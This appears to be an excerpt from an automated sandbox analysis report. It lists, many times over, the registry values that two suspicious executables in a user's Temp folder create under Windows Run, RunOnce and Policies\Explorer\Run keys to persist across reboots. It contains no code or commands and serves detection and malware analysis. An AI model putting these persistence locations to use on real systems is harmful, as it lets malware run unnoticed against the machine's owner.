Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakzJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run qhneokveviakxo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run thkyfygmakz
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymey
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypyk
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgo
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrc
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
